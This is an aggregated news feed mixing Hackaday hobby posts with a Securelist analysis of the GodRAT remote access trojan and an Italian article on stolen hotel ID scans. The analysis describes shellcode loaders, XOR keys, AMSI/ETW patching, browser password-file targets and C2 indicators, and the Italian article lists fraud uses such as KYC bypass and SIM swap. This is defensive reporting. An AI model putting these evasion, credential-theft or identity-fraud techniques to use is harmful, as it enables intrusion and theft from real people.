More and more car manufacturers these days are becoming interested in the recurring revenue model, with Volkswagen’s ID.3 BEV being the latest to have an optional ‘motor power upgrade’ that you can pay for either monthly or with a ‘lifetime’ payment.

As the BBC reports, this option is now available in the UK, with customers offered the option to pay £16.50 per month or £165 annually, or opt to shell out £649 for what is reportedly a ‘car lifetime’ subscription.

It appears that this subscription service has been in the works for a while already, with it being offered first last year in countries like Denmark, following which it appears to be rolled out in other countries too. The software unlock changes the maximum motor output from 150 kW to 170 kW, which some users report as being noticeable.

Regardless of whether you find this to be a good deal, the concept of Car-As-A-Service (CAAS) has becoming increasingly prevalent, with the BBC article referencing BMW’s heated seats subscription and Mercedes’ acceleration subscription. Considering that all the hardware is already in the car that you purportedly purchased, this is sure to rub people the wrong way, not to mention that from a car tuning perspective this seems to suggest that third-party tuners don’t need to apply.

Thanks to [Robert Piston] for the tip.

hackaday.com/2025/08/19/volksw…

Summary

In September 2024, we detected malicious activity targeting financial (trading and brokerage) firms through the distribution of malicious .scr (screen saver) files disguised as financial documents via Skype messenger. The threat actor deployed a newly identified Remote Access Trojan (RAT) named GodRAT, which is based on the Gh0st RAT codebase. To evade detection, the attackers used steganography to embed shellcode within image files. This shellcode downloads GodRAT from a Command-and-Control (C2) server.

GodRAT supports additional plugins. Once installed, attackers utilized the FileManager plugin to explore the victim’s systems and deployed browser password stealers to extract credentials. In addition to GodRAT, they also used AsyncRAT as a secondary implant to maintain extended access.

GodRAT is very similar to the AwesomePuppet, another Gh0st RAT-based backdoor, which we reported in 2023, both in its code and distribution method. This suggests that it is probably an evolution of AwesomePuppet, which is in turn likely connected to the Winnti APT.

As of this blog’s publication, the attack remains active, with the most recent detection observed on August 12, 2025. Below is a timeline of attacks based on detections of GodRAT shellcode injector executables. In addition to malicious .scr (screen saver) files, attackers also used .pif (Program Information File) files masquerading as financial documents.

Technical details

Malware implants

Shellcode loaders

We identified the use of two types of shellcode loaders, both of which execute the shellcode by injecting it into their own process. The first embeds the shellcode bytes directly into the loader binary, and the second reads the shellcode from an image file.

A GodRAT shellcode injector file named “2024-08-01_2024-12-31Data.scr” (MD5 d09fd377d8566b9d7a5880649a0192b4) is an executable that XOR-decodes embedded shellcode using the following hardcoded key: “OSEDBIU#IUSBDGKJS@SIHUDVNSO*SKJBKSDS#SFDBNXFCB”. A new section is then created in the memory of an executable process, where the decoded shellcode is copied. Then the new section is mapped into the process memory and a thread is spawned to execute the shellcode.

Another file, “2024-11-15_23.45.45 .scr” (MD5 e723258b75fee6fbd8095f0a2ae7e53c), serves as a self-extracting executable containing several embedded files as shown in the image below.

Content of self-extracting executable

Among these is “SDL2.dll” (MD5 512778f0de31fcce281d87f00affa4a8), which is a loader. The loader “SDL2.dll” is loaded by the legitimate executable Valve.exe (MD5 d6d6ddf71c2a46b4735c20ec16270ab6). Both the loader and Valve.exe are signed with an expired digital certificate. The certificate details are as follows:

• Serial Number: 084caf4df499141d404b7199aa2c2131
• Issuer Common Name: DigiCert SHA2 Assured ID Code Signing CA
• Validity: Not Before: Friday, September 25, 2015 at 5:30:00 AM; Not After: Wednesday, October 3, 2018 at 5:30:00 PM
• Subject: Valve

The loader “SDL2.dll” extracts shellcode bytes hidden within an image file “2024-11-15_23.45.45.jpg”. The image file represents some sort of financial details as shown below.

The loader allocates memory, copies the extracted shellcode bytes, and spawns a thread to execute it. We’ve also identified similar loaders that extracted shellcode from an image file named “2024-12-10_05.59.18.18.jpg”. One such loader (MD5 58f54b88f2009864db7e7a5d1610d27d) creates a registry load point entry at “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MyStartupApp” that points to the legitimate executable Valve.exe.

Shellcode functionality

The shellcode begins by searching for the string “godinfo,” which is immediately followed by configuration data that is decoded using the single-byte XOR key 0x63. The decoded configuration contains the following details: C2 IP address, port, and module command line string. The shellcode connects to the C2 server and transmits the string “GETGOD.” The C2 server responds with data representing the next (second) stage of the shellcode. This second-stage shellcode includes bootstrap code, a UPX-packed GodRAT DLL and configuration data. However, after downloading the second-stage shellcode, the first stage shellcode overwrites the configuration data in the second stage with its own configuration data. A new thread is then created to execute the second-stage shellcode. The bootstrap code injects the GodRAT DLL into memory and subsequently invokes the DLL’s entry point and its exported function “run.” The entire next-stage shellcode is passed as an argument to the “run” function.

GodRAT

The GodRAT DLL has the internal name ONLINE.dll and exports only one method: “run”. It checks the command line parameters and performs the following operations:

1. If the number of command line arguments is one, it copies the command line from the configuration data, which was “C:\Windows\System32\curl.exe” in the analyzed sample. Then it appends the argument “-Puppet” to the command line and creates a new process with the command line “C:\Windows\System32\curl.exe -Puppet”. The parameter “-Puppet” was used in AwesomePuppet RAT in a similar way. If this fails, GodRAT tries to create a process with the hardcoded command “%systemroot%\system2\cmd.exe -Puppet”. If successful, it suspends the process, allocates memory, and writes the shellcode buffer (passed as a parameter to the exported function “run”) to the allocated memory. A thread is then created to execute the shellcode, and the current process exits. This is done to execute GodRAT inside the curl.exe or cmd.exe process.
2. If the number of command line arguments is greater than one, it checks if the second argument is “-Puppet.” If true, it proceeds with the RAT’s functionality; otherwise, it acts as if the number of command line arguments is one, as described in the previous case.

The RAT establishes a TCP connection to the C2 server on the port from the configuration blob. It collects the following victim information: OS information, local hostname, malware process name and process ID, user account name associated with malware process, installed antivirus software and whether a capture driver is present. A capture driver is probably needed for capturing pictures, but we haven’t observed such behavior in the analyzed sample.

The collected data is zlib (deflate) compressed and then appended with a 15-byte header. Afterward, it is XOR-encoded three times per byte. The final data sent to the C2 server includes a 15-byte header followed by the compressed data blob. The header consists of the following fields: magic bytes (\x74\x78\x20) , total size (compressed data size + header size), decompressed data size, and a fixed DWORD (1 for incoming data and 2 for outgoing data). The data received from the C2 is only XOR-decoded, again three times per byte. This received data includes a 15-byte header followed by the command data. The RAT can perform the following operations based on the received command data:

• Inject a received plugin DLL into memory and call its exported method “PluginMe”, passing the C2 hostname and port as arguments. It supports different plugins, but we only saw deployment of the FileManager plugin
• Close the socket and terminate the RAT process
• Download a file from a provided URL and launch it using the CreateProcessA API, using the default desktop (WinSta0\Default)
• Open a given URL using the shell command for opening Internet Explorer (e.g. “C:\Program Files\Internet Explorer\iexplore.exe” %1)
• Same as above but specify the default desktop (WinSta0\Default)
• Create the file “%AppData%\config.ini”, create a section named “config” inside this file, and, create in that section a key called “NoteName” with the string provided from the C2 as its value

GodRAT FileManager plugin

The FileManager plugin DLL has the internal name FILE.dll and exports a single method called PluginMe. This plugin gathers the following victim information: details about logical drives (including drive letter, drive type, total bytes, available free bytes, file system name, and volume name), the desktop path of the currently logged-on user, and whether the user is operating under the SYSTEM account. The plugin can perform the following operations based on the commands it receives:

• List files and folders at a specified location, collecting details like type (file or folder), name, size, and last write time
• Write data to an existing file at a specified offset
• Read data from a file at a specified offset
• Delete a file at a specified path
• Recursively delete files at a specified path
• Check for the existence of a specified file. If the file exists, send its size; otherwise, create a file for writing.
• Create a directory at a specified path
• Move an existing file or directory, including its children
• Open a specified application with its window visible using the ShellExecuteA API
• Open a specified application with its window hidden using the ShellExecuteA API
• Execute a specified command line with a hidden window using cmd.exe
• Search for files at a specified location, collecting absolute file paths, sizes, and last write times
• Stop a file search operation
• Execute 7zip by writing hard-coded 7zip executable bytes to “%AppData%\7z.exe” (MD5 eb8d53f9276d67afafb393a5b16e7c61) and “%AppData%\7z.dll” (MD5 e055aa2b77890647bdf5878b534fba2c), and then runs “%AppData%\7z.exe” with parameters provided by the C2. The utility is used to unzip dropped files.

Second-stage payload

The attackers deployed the following second-stage implants using GodRAT’s FileManager plugin:

Chrome password stealer

The stealer is placed at “%ALLUSERSPROFILE%\google\chrome.exe” (MD5 31385291c01bb25d635d098f91708905). It looks for Chrome database files with login data for accessed websites, including URLs and usernames used for authentication, as well as user passwords. The collected data is saved in the file “google.txt” within the module’s directory. The stealer searches for the following files:

• %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data – an SQLite database with login and stats tables. This can be used to extract URLs and usernames used for authentication. Passwords are encrypted and not visible.
• %LOCALAPPDATA%\Google\Chrome\User Data\Local State – a file that contains the encryption key needed to decrypt stored passwords.

MSEdge password stealer

The stealer is placed at “%ALLUSERSPROFILE%\google\msedge.exe” (MD5 cdd5c08b43238c47087a5d914d61c943). The collected data is stored in the file “edge.txt” in the module’s directory. The module attempts to extract passwords using the following database and file:

• %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data – the “Login Data” SQLite database stores Edge logins in the “logins” table.
• %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State – this file contains the encryption key used to decrypt saved passwords.

AsyncRAT

The DLL file (MD5 605f25606bb925d61ccc47f0150db674) is an injector and is placed at “%LOCALAPPDATA%\bugreport\LoggerCollector.dll” or “%ALLUSERSPROFILE%\bugreport\LoggerCollector.dll”. It verifies that the module name matches “bugreport_.exe”. The loader then XOR-decodes embedded shellcode using the key “EG9RUOFIBVODSLFJBXLSVWKJENQWBIVUKDSZADVXBWEADSXZCXBVADZXVZXZXCBWES”. After decoding, it subtracts the second key “IUDSY86BVUIQNOEWSUFHGV87QCI3WEVBRSFUKIHVJQW7E8RBUYCBQO3WEIQWEXCSSA” from each shellcode byte.

A new memory section is created, the XOR-decoded shellcode is copied into it, and then the section is mapped into the current process memory. A thread is started to execute the code in this section. The shellcode is used to reflectively inject the C# AsyncRAT binary. Before injection, it patches the AMSI scanning functions (AmsiScanBuffer, AmsiScanString) and the EtwEventWrite function to bypass security checks.
AsyncRAT includes an embedded certificate with the following properties:

• Serial Number: df:2d:51:bf:e8:ec:0c:dc:d9:9a:3e:e8:57:1b:d9
• Issuer: CN = marke
• Validity: Not Before: Sep 4 18:59:09 2024 GMT; Not After: Dec 31 23:59:59 9999 GMT
• Subject: CN = marke

GodRAT client source and builder

We discovered the source code for the GodRAT client on a popular online malware scanner. It had been uploaded in July 2024. The file is named “GodRAT V3.5_______dll.rar” (MD5 04bf56c6491c5a455efea7dbf94145f1). This archive also includes the GodRAT builder (MD5 5f7087039cb42090003cc9dbb493215e), which allows users to generate either an executable file or a DLL. If an executable is chosen, users can pick a legitimate executable name from a list (svchost.exe, cmd.exe, cscript.exe, curl.exe, wscript.exe, QQMusic.exe and QQScLauncher.exe) to inject the code into. When saving the final payload, the user can choose the file type (.exe, .com, .bat, .scr and .pif). The source code is based on Gh0st RAT, as indicated by the fact that the auto-generated UID in “GodRAT.h” file matches that of “gh0st.h”, which suggests that GodRAT was originally just a renamed version of Gh0st RAT.

GodRAT.h

gh0st.h

Conclusions

The rare command line parameter “puppet,” along with code similarities to Gh0st RAT and shared artifacts such as the fingerprint header, indicate that GodRAT shares a common origin with AwesomePuppet RAT, which we described in a private report in 2023. This RAT is also based on the Gh0st RAT source code and is likely connected with Winnty APT activities. Based on these findings, we are highly confident that GodRAT is an evolution of AwesomePuppet. There are some differences, however. For example, the C2 packet of GodRAT uses the “direction” field, which was not utilized in AwesomePuppet.

Old implant codebases, such as Gh0st RAT, which are nearly two decades old, continue to be used today. These are often customized and rebuilt to target a wide range of victims. These old implants are known to have been used by various threat actors for a long time, and the GodRAT discovery demonstrates that legacy codebases like Gh0st RAT can still maintain a long lifespan in the cybersecurity landscape.

Indicator of Compromise

File hashes

cf7100bbb5ceb587f04a1f42939e24ab
d09fd377d8566b9d7a5880649a0192b4 GodRAT Shellcode Injector
e723258b75fee6fbd8095f0a2ae7e53c GodRAT Self Extracting Executable
a6352b2c4a3e00de9e84295c8d505dad
6c12ec3795b082ec8d5e294e6a5d6d01
bb23d0e061a8535f4cb8c6d724839883
160a80a754fd14679e5a7b5fc4aed672
2750d4d40902d123a80d24f0d0acc454
441b35ee7c366d4644dca741f51eb729
318f5bf9894ac424fd4faf4ba857155e GodRAT Shellcode Injector
512778f0de31fcce281d87f00affa4a8 GodRAT Shellcode Injector
6cad01ca86e8cd5339ff1e8fff4c8558 GodRAT Shellcode Injector
58f54b88f2009864db7e7a5d1610d27d GodRAT Shellcode Injector
64dfcdd8f511f4c71d19f5a58139f2c0 GodRAT FileManager Plugin(n)
8008375eec7550d6d8e0eaf24389cf81 GodRAT
04bf56c6491c5a455efea7dbf94145f1 GodRAT source code
5f7087039cb42090003cc9dbb493215e GodRAT Builder
31385291c01bb25d635d098f91708905 Chrome Password Stealer
cdd5c08b43238c47087a5d914d61c943 MSEdge Password Stealer
605f25606bb925d61ccc47f0150db674 Async RAT Injector (n)
961188d6903866496c954f03ecff2a72 Async RAT Injector
4ecd2cf02bdf19cdbc5507e85a32c657 Async RAT
17e71cd415272a6469386f95366d3b64 Async RAT

File paths

C:\users\[username]\downloads\2023-2024clientlist＆.scr
C:\users\[username]\downloads\2024-11-15_23.45.45 .scr
C:\Users\[username]\Downloads\2024-08-01_2024-12-31Data.scr
C:\Users\[username]\\Downloads\2025TopDataTransaction&.scr
C:\Users\[username]\Downloads\2024-2025Top&Data.scr
C:\Users\[username]\Downloads\2025TopClineData&1.scr
C:\Users\[username]\Downloads\Corporate customer transaction &volume.pif
C:\telegram desktop\Company self-media account application qualifications&.zip
C:\Users\[username]\Downloads\个人信息资料&.pdf.pif
%ALLUSERSPROFILE%\bugreport\360Safe2.exe
%ALLUSERSPROFILE%\google\chrome.exe
%ALLUSERSPROFILE%\google\msedge.exe
%LOCALAPPDATA%\valve\valve\SDL2.dll
%LOCALAPPDATA%\bugreport\LoggerCollector.dll
%ALLUSERSPROFILE%\bugreport\LoggerCollector.dll
%LOCALAPPDATA%\bugreport\bugreport_.exe

Domains and IPs

103[.]237[.]92[.]191 GodRAT C2
118[.]99[.]3[.]33 GodRAT С2
118[.]107[.]46[.]174 GodRAT C2
154[.]91[.]183[.]174 GodRAT C2
wuwu6[.]cfd AsyncRAT C2
156[.]241[.]134[.]49 AsyncRAT C2
https://holoohg.oss-cn-hongkong.aliyuncs[.]com/HG.txt AsyncRAT URL
47[.]238[.]124[.]68 AsyncRAT C2

securelist.com/godrat/117119/

In what sounds like the plot from a sci-fi movie, scientists have isolated an incredibly rare immune mutation to create a universal antiviral treatment.

Only present in a few dozen people worldwide, ISG15 immunodeficiency causes people to be more susceptible to certain bacterial illnesses, but it also grants the people with this condition immunity to known viruses. Researchers think that the constant, mild inflammation these individuals experience is at the root of the immunoresponse.

Where things get really interesting is how the researchers have found a way to stimulate protein production of the most beneficial 10 proteins of the 60 created by the natural mutation using 10 mRNA sequences inside a lipid nanoparticle. Lead researcher [Vagelos Bogunovic] says “we have yet to find a virus that can break through the therapy’s defenses.” Researchers hope the treatment can be administered to first responders as a sort of biological Personal protective equipment (PPE) against the next pandemic since it would likely work against unknown viruses before new targeted vaccines could be developed.

Hamsters and mice were given this treatment via nasal drip, but how about intranasal vaccines when it comes time for human trials? If you want a short history of viruses or to learn how smartwatches could help flatten the curve for the next pandemic, we’ve got you covered.

hackaday.com/2025/08/19/antivi…

A cura di Luca Stivali e Roland Kapidani.

Nel giro di dieci giorni un nickname mai visto prima, mydocs, ha inondato un dark forum con una serie di thread tutti uguali: stesso template, stessa call-to-action su Telegram, stessi sample in alta risoluzione. Cambiano solo i nomi degli hotel.

La geografia delle vittime è sorprendentemente estesa: da Milano a Roma, passando per Rimini, Bardonecchia, Montecatini, Venezia e Ischia, fino a Palma di Maiorca. Ed è proprio quest’ultimo caso, quello di Maiorca, che introduce un dettaglio critico — l’esplicita menzione di un ‘private cloud bucket’ — che ha acceso il nostro campanello d’allarme sull’esistenza di una probabile catena d’attacco unificata, ben oltre gli scenari di compromissione individuale degli hotel.

A ogni post corrisponde un pacchetto di scansioni fronte/retro di documenti d’identità, ordinate “per paese d’origine” e vendute a blocchi da qualche migliaio fino a decine di migliaia di documenti. In totale, oltre 177.000 immagini sensibili messe sul banco.

La tempistica è troppo precisa per essere casuale. I post parlano di “guest management system” e “KYC di check-in”. I nomi dei file nei sample seguono lo stesso schema (UUID con suffisso _front/_back.jpg). In diversi thread la finestra è “fine luglio / inizio agosto 2025”. In quello spagnolo si cita esplicitamente un “private cloud bucket”.

Non è la classica somma di piccoli disastri locali: è l’effetto di un unico punto debole a monte, molto probabilmente un fornitore SaaS che tanti hotel usano per acquisire e archiviare i documenti alla reception. Una volta dentro quel perimetro – pannello multi-tenant, API, bucket di storage – si scarica cliente per cliente. E si monetizza per lotti.

L’economia della campagna è lineare. I pacchetti “turistici” da 20–22 mila immagini stanno a 10.000 dollari l’uno, i dataset “premium” come Venezia (38k) e Ischia (30k) salgono a 20k e 14k. I dump piccoli (Cassino 1,7k, Montecatini 3,6k) fanno da esca: prezzo accessibile, velocità di vendita, feedback sul profilo.

In media siamo intorno a 0,46$ per documento, una cifra che dice tutto sulla disponibilità del mercato nero a pagare per materiale che bypassa i controlli KYC. Perché è questo il punto: scansioni nitide, MRZ leggibile, fronte/retro. Il carburante perfetto per frodi identitarie di nuova generazione.

Cosa ci fanno, davvero, con questi documenti

Il primo utilizzo è banale e devastante: onboarding KYC su neo banche, wallet e exchange crypto che accettano la verifica solo documentale o con selfie liveness di base. Con scansioni in alta qualità e qualche trucco (stampa in scala reale, schermo ad alta luminanza, “document puppeteering”), molte pipeline di verifica cedono.

Si aprono conti “puliti” per riciclare denaro, incassare truffe, far transitare pagamenti di mule. Il secondo è il credito istantaneo: BNPL, microprestiti, linee revolving. Qui contano rapidità e tasso di accettazione; se la piattaforma è poco matura, bastano foto chiare e dati coerenti per ottenere merce o denaro che non verrà mai restituito.

Quando parliamo di onboarding KYC ci riferiamo al momento in cui una banca, un’app di pagamenti o una piattaforma di trading online deve “conoscere il cliente” (Know Your Customer). In pratica, al nuovo utente viene chiesto di caricare la foto del documento e talvolta un selfie, per dimostrare che la persona esiste davvero. È una misura pensata per fermare truffatori e riciclatori di denaro. Ma se i criminali mettono le mani su scansioni autentiche di passaporti e carte d’identità, possono usarle al posto della vittima e ottenere accesso a conti e servizi in maniera fraudolenta.

Poi c’è il mondo delle telecomunicazioni. Con un documento valido e l’abbinata di dati anagrafici reperibili altrove, si forza una portabilità o un duplicato SIM: il passaggio successivo è il SIM swap, con l’accesso ai codici OTP e l’account takeover di servizi bancari e caselle email. Non serve essere un APT: serve il documento giusto e l’operatore sbagliato.

Un altro uso meno evidente è la creazione di identità sintetiche. Si combinano pezzi reali (documento di Tizio) con tracce digitali di Caio (residenza, utenze, social “di supporto”), si costruisce un soggetto semi-plausibile e lo si fa crescere: piccoli acquisti, sottoscrizioni, cronologia “pulita”. Dopo qualche mese quell’identità è abbastanza “viva” da superare score di antifrode più severi. Le scansioni di qualità sono la base iconografica per questi avatar: consentono anche manipolazioni convincenti (cambio foto, ritocchi del background, watermark rimossi) che confondono sia l’occhio umano sia alcuni motori di validazione automatica.

C’è poi l’ingegneria sociale. Con il documento in mano, un helpdesk è più incline a “riconoscere” il chiamante; nei processi di account recovery molti operatori ancora accettano un ID mostrato in video call. Quei file resteranno in circolazione per anni, perché un documento d’identità non “scade” come una password.

Come si buca un fornitore a monte

Il quadro tecnico più verosimile è un pannello multi-tenant o un object storage condiviso tra clienti, con controlli granulari insufficienti. Bastano API key finite in log pubblici, una chiave hard-coded in un device di scansione, o una vulnerabilità nel modulo di upload/consultazione per ottenere un primo accesso. Da lì, se i tenant non sono isolati come dovrebbero, si passa da un hotel all’altro. A volte non serve neppure la vulnerabilità: una exposed bucket policy “list/get” senza ip-allow list è un invito. E se il provider non applica rotazioni e MFA sugli account operativi, l’accesso resta silenzioso per settimane.

Non è un caso che i post abbiano tutti la stessa finestra temporale: fine luglio / inizio agosto. È la fase in cui l’attaccante ha probabilmente stabilizzato l’accesso, schedulato gli export, e assemblato i pacchetti da vendere.

L’inserzione spagnola, con il riferimento esplicito al “private cloud bucket”, è il tassello che unisce i puntini: un servizio transnazionale, non il NAS di un singolo hotel.

Perché succede (e continuerà a succedere)

Abbiamo chiesto direttamente a MyDocs di darci qualche indizio su cosa accomuna tutti gli exploit che hanno colpito gli hotel italiani. Questa la sua risposta:

Thank you for your message.

If we had to point to a common factor behind the recent incidents affecting hotels in Italy, it would likely be the human element — specifically, the tendency not to change default or weak passwords, combined with the effectiveness of social engineering techniques.

These two aspects continue to be exploited across various sectors, and unfortunately, hospitality is no exception.

We hope this small insight is helpful for your research and awareness initiatives.

Best regards, MyDocs

L’attaccante mette in evidenza un punto che a noi di RHC sta particolarmente a cuore: il problema legato alle persone e ai processi. Negli hotel, come in molti altri settori, la priorità è spesso l’esperienza del cliente, mentre la sicurezza rimane in secondo piano. Questo favorisce la persistenza di password di default, scarsa rotazione delle credenziali e bassa formazione del personale: condizioni che aprono la porta a intrusioni malevole.

Come dimostra la risposta di MyDocs, la minaccia non è solo tecnica, ma organizzativa e culturale. Threat actor come lui sfruttano vulnerabilità “semplici” e ripetibili, scalando facilmente da una struttura all’altra con lo stesso approccio.

L’intervento del CERT-AgID

Nel pieno dell’escalation dei post di mydocs, il CERT‑AgID si è attivato con comunicati ufficiali per mettere in guardia sia il settore digitale sia i cittadini. Il primo, pubblicato il 6 agosto 2025, rilevava la presenza “di decine di migliaia di scansioni ad alta risoluzione di passaporti, carte d’identità e altri documenti di riconoscimento” sottratti a hotel italiani attraverso accessi non autorizzati.

Il dipartimento ha anche diramato una circolare ai gestori di servizi fiduciari (ad es. SPID o firma digitale), invitandoli a rafforzare le pratiche di verifica documentale e sensibilizzando le strutture sull’impatto della vendita illegale di documenti. Inoltre, AgID ha rivolto un appello ai cittadini affinché prestino attenzione a possibili utilizzi illeciti dei propri documenti, come richieste di credito sospette o l’apertura non autorizzata di conti, e a segnalarli tempestivamente alle autorità.

E adesso?

La risposta non può essere solo legale, anche se qui il GDPR sarà protagonista: trattamenti ad alta sensibilità, dovere di notifica al Garante e agli interessati, audit sui Data Processing Agreement con il fornitore. Serve rimettere mano all’architettura. Tradotto: conservare meno, per meno tempo, e meglio. Le copie di documenti dovrebbero essere tokenizzate e segregate; gli originali cifrati con chiavi gestite dal titolare; l’accesso ai bucket ristretto a processi server-to-server con policy minimali. Telemetria: se qualcuno scarica ventimila JPG in tre ore, deve accendersi un riflettore, non un LED.

Il conto, alla fine, lo pagano tutti: gli hotel, che vedono la fiducia dei clienti sgretolarsi, i fornitori, che dovranno spiegare tecnicamente l’accaduto, le persone ritratte che scopriranno tra mesi – magari alla prima carta rifiutata o alla SIM disattivata – cosa significa far parte di un dataset “ordinato per paese”. Finché continueremo a trattare il documento d’identità come un semplice allegato JPG dentro un SaaS, la domanda non sarà se vedremo un’altra campagna come questa. Ma quando e quanto grande.

Ed è qui che torna il nodo centrale: le persone e i processi. Nessuna tecnologia, da sola, potrà mai prevenire la mancanza di una cultura alla sicurezza. Senza formazione continua per chi lavora in reception, senza procedure chiare per la gestione delle identità digitali, ogni investimento tecnico rischia di trasformarsi in un castello di sabbia. La sicurezza non è (solo) un firewall o un cloud più robusto: è la somma di scelte quotidiane, di processi corretti e di persone consapevoli.

L'articolo Dark web e hotel italiani: ecco cosa ci ha rivelato MyDocs sui documenti rubati proviene da il blog della sicurezza informatica.

While talking computers are old hat today, in 1978, a talking toy like the Speak and Spell was the height of novel tech. [Kevin] found a vintage one, but it didn’t work. It looked like someone had plugged in the wrong power adapter, leading to, undoubtedly, one or more unhappy children. There was some damage that suggests someone had already tried to repair it, but without success.

In addition to effecting the repair, [Kevin] took lots of pictures, so if you ever wanted to peek inside one of these, this is your chance. The case had no screws, just clips, although apparently some of the newer models did have some screws.

In addition to a sophisticated speech synthesizer, the gadget had a sophisticated power supply to drive the vacuum fluorescent display. The power supply board had a suspicious burn mark and a cracked TO-92 transistor.

[Kevin] found that someone had reversed a schematic for a similar power board used in a different version of the toy, but it was close enough. The simple switching power supply used a handful of bipolar transistors. The cracked transistor was one of a pair, so to be safe, both needed replacement. After all, the transistor failing either put a high load on the uncracked transistor or, perhaps, it cracked because the other transistor failed first.

Oddly, after that repair, the device would work with an AC adapter, but not with batteries. The battery voltage is a little lower, so with a little simulation and some changes in components, the device works again, even with weaker batteries. You can see the startup sequence on a scope in the video below.

If you want to explore Speak and Spells yourself, don’t miss the bibliography at the end of the post. Some people swear by these toys. Other people make them swear. If you’d rather build something new than repair, there’s help for you.

youtube.com/embed/dADi1DFhypU?…

hackaday.com/2025/08/18/silent…

We’re all used to emulating older computers here, and we’ve seen plenty of projects that take a cheap microcontroller and use it to emulate a classic home computer or gaming platform. They’re fun, but serve mostly as a way to relive old toys.

As microcontrollers become faster though it’s inevitable that the machines they can emulate become more powerful too, so we’re moving into the realm of emulating productivity machines from years past. An example is [Ilya Maslennikov]’s pico-286, which as its name suggests, is a 286 PC emulator for the Raspberry Pi Pico.

It has an impressive set of sound and video card emulations, can drive either a VGA or an HDMI monitor, and uses a PS/2 keyboard and mouse. If DOS games are your thing it should provide what you want, but it’s caught our eye because there was a time when a 286 DOS PC was a productivity machine. There’s a huge library of still-useful software for DOS, and thus the prospect of a handheld DOS PC still has some appeal. We’d love to see someone put this in a badge.

MS-DOS may no longer be for sale, but there are several ways to land an open-source DOS in 2025. FreeDOS is something of a powerhouse.

hackaday.com/2025/08/18/the-pc…

The Allen key turns 115 this year. It’s strange to believe that in all that time, no one has come up with an adjustable version, but apparently true. Luckily [Chronova Engineering] has taken up the challenge in his latest video.

The video is a fascinating glimpse at the toolmaker’s art–manual machining and careful human judgement. Humans being the fallable creatures we are, the design goes through a few iterations. After the first failure in metal, [Chronova] falls back on 3D printing to rapidly prototype the next six iterations. Given how much work goes into manually machining the designs, we can only imagine the time savings that represents.

The final version is has classic hexagonal rod split in two, so that a chisel-shaped rod can spread the two prongs out to engage the sides of the Allen bolt. Even with that settled, the prongs and wedge had to be redesigned several times to find exact shape and heat-treatment that would work. At this point the range is anything between 4 mm and 6 mm, which is admittedly narrow, but [Chronova Engineering] believes the mechanism has the potential to go wider.

The design is not being patented, but the drawings are available via the [Chronova Engineering] Patreon if you really need an adjustable Allen key and don’t feel like reverse-engineering the mechanism from video. It’s a much larger project than we’ve featured from this channel before– enormous, really, compared to steam engines that fit on pencil erasers or electric motors that squeeze through the eye of a needle.

Our thanks hall-of-fame tipster [Keith Olson] for letting us know about this one. If you want a slice of that fame for yourself, the tips line is always open.

youtube.com/embed/8IewMXUzt7U?…

hackaday.com/2025/08/18/adjust…

Like many of us, [Ben] has too many 3D printers. What do you do with the old ones? In his case, he converted it into a robotic camera rig. See the results, including footage from the robot, in the video below. In addition to taking smooth video, the robot can spin around to take photos for photogrammetry.

In fact, the whole thing started with an idea of building a photogrammetry rig. That project didn’t go as well as planned, but it did lead to this interesting project.

Motion control used to be exotic, but 3D printers really put it in the mainstream. The printer has motors, lead screws, gears, and belts. Of course, there are plenty of 3D printed parts, too. He did buy a few new pieces of extrusion and some longer belts. In addition, he had to upgrade one stepper to one that uses gears.

The camera tilts plus or minus 90 degrees on what used to be the X axis. The Y axis moves the camera forward and backward. The Z axis still moves up and down, but the extruder motor has a new job.

The extruder motor rotates the target object. Originally, the plan was to spin the camera, but that was difficult since the ring is 18 inches across. In addition to reliably moving it, there’s the wire management to worry about, too. So even though the original plan was to rotate the camera, the final project rotates the object on a turntable.

After prototyping with the 3D printer, he had an outside service CNC many of the parts in metal, both for the appearance and for the rigidity. But we imagine it would be fine with good-quality 3D printed parts.

Overall, a nice way to upcycle an old printer. We didn’t see the design files for any of the parts, but you’d probably have to customize your approach anyway. We’ve seen plenty of these camera rigs. Some of them recycle other tech.

youtube.com/embed/Qk4X3khyoXI?…

hackaday.com/2025/08/18/i-3d-p…

The Becquerel (Bq) is an SI unit of radioactivity: one becquerel is equivalent to one radioactive decay per second. That absolutely does not make it equivalent to one hertz — the random nature of radioactive decay means you’ll never get one pulse every second — but it does make it interesting. [mihai.cuciuc] certainly thought so, when he endeavored to create a clock that would tick at one becquerel.

The result is an interesting version of a Vetinari Clock, first conceived of by [Terry Pratchett] in his Discworld books. In the books, the irregular tick of the clock is used by Lord Vetinari as a form of psychological torture. For some reason, imposing this torture on ourselves has long been popular amongst hackers.

Without an impractical amount of shielding, any one-becquerel source would be swamped by background radiation, so [mihai] had to get creative. Luckily, he is the creator of the Pomelo gamma-ray spectroscope, which allowed him to be discriminating. He’s using an Am-241 source, but just looking for the characteristic 59.5 KeV gamma rays was not going to cut it at such a low count rate. Instead he’s using two of the Pomelo solid-state scintillation as a coincidence detector, with one tuned for the Am-241’s alpha emissions. When both detectors go off simultaneously, that counts as an event and triggers the clock to tick.

How he got exactly one becquerel of activity is a clever hack, too. The Am-241 source he has is far more active than one decay per second, but by varying the distance from the gamma detector he was able to cut down to one detection per second using the inverse square law and the shielding provided by Earth’s atmosphere. The result is a time signal that is a stable one hertz… if averaged over a long enough period. For now, anyway. As the Am-241 decays away, its activity decreases, and [mihai] admits the clock loses about 0.4 seconds per day.

While we won’t be giving the prize for accuracy in this contest, we are sure Lord Vetinari would be proud. The Geiger-counter sound effect you can hear in the demo video embedded below is great touch. It absolutely increases the psychic damage this cursed object inflicts.

youtube.com/embed/x_zuBJ4F6ZQ?…

hackaday.com/2025/08/18/2025-o…

Automotive headlights started out burning acetylene, before regular electric lightbulbs made them obsolete. In due time, halogen bulbs took over, before the industry began to explore even newer technologies like HID lamps for greater brightness. Laser headlights stood as the next leap forward, promising greater visibility and better light distribution.

Only, the fairytale didn’t last. Just over a decade after laser headlights hit the market, they’re already being abandoned by the manufacturers that brought them to fruition. Laser headlights would end up fighting with one hand behind their back, and ultimately became irrelevant before they ever became the norm.

Bright Lights

Laser headlights were first announced by BMW in 2013, with the German company promising the technology would be available on its new halo car, the i8. Fellow German rivals Audi would end up pipping the Bavarians to the punch, launching the limited-production Audi R8 LMX with laser headlights just months before the i8 entered production. Both brands would later bring the technology to a range of luxury models, including sedans and SUVs.
Long-throw laser lights became an option on premium Audi and BMW vehicles. Credit: Audi
